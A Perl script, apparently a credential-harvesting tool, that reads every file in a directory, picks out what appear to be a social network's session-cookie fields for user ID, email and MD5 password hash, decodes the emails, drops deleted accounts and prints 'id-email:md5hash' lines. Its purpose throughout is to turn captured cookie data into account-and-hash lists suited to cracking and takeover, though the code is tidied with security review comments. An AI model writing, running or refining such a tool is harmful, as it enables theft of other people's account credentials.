Extracts MD5 password hashes and credentials from files. Scans files in a directory, looks for remixmid (ID), remixemail (email), and remixpass (MD5 hash) patterns, URL-decodes email addresses, and outputs credentials in format: id-email:md5hash. Filters out deleted accounts.
perl md5-coco.pl <directory>
Scans all files in directory for credential patterns and outputs extracted credentials.
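#!/usr/bin/perl
#
# md5-coco.pl - read every regular file in a directory, pick out the
# remixmid / remixemail / remixpass values, and print one
# "id-email:md5hash" line per file that has both an e-mail and a hash.
#
# Usage: perl md5-coco.pl <directory>
#
# Parsing rule: the value of a field is the line FOLLOWING the line that
# mentions the field name. If a name appears several times in one file,
# the last occurrence wins. Files whose decoded e-mail contains the text
# "deleted" are skipped.
#
# The files being parsed are untrusted input, so:
#   * files are opened with three-argument open on a lexical handle; the
#     two-argument form lets a crafted file name (leading '>' or a
#     trailing '|') be read as an open mode or a command pipe;
#   * directory entries that are not regular files are skipped;
#   * NOTE(review): the e-mail is percent-decoded and printed as-is, so
#     it can carry control characters (newline, terminal escapes) into
#     the output. Sanitise before feeding the output to a terminal or
#     a line-oriented consumer.
use strict;
use warnings;
use File::Spec;

my $root = $ARGV[0];
die "usage: perl md5-coco.pl <directory>\n"
    unless defined $root and length $root;

# A failed opendir used to be ignored, which made a bad path look like an
# empty directory.
opendir(my $dir_handle, $root) or die "cannot open directory $root: $!";
my @filelist = readdir $dir_handle;
closedir $dir_handle;

foreach my $filename (@filelist) {
    next if $filename eq '.' or $filename eq '..';

    # catfile picks the platform's separator instead of a hard-coded '\'.
    my $path = File::Spec->catfile($root, $filename);
    next unless -f $path;

    open(my $fh, '<', $path) or die "file $filename fail...";
    my @rows = <$fh>;
    close $fh;
    chomp(@rows);

    my ($id, $mail, $pd5) = ('', '', '');

    foreach my $i (0 .. $#rows) {
        my $row = $rows[$i];

        # A marker on the very last line has no following line; use ''
        # rather than reading past the end of the array.
        my $next = $i < $#rows ? $rows[$i + 1] : '';

        if ($row =~ /remixmid/) {
            $id = $next;
        }
        if ($row =~ /remixemail/) {
            $mail = $next;
            # Percent-decode. The class is hex digits only (0-9, A-F); the
            # earlier A-H range also accepted non-hex pairs such as %GG.
            $mail =~ s/%([0-9A-F]{2})/pack('C', hex($1))/egi;
        }
        if ($row =~ /remixpass/) {
            $pd5 = $next;
        }
    }

    # Emit only complete records that are not marked as deleted.
    if ($mail && $pd5 && ($mail !~ /deleted/)) {
        print "$id-$mail:$pd5\n";
    }
}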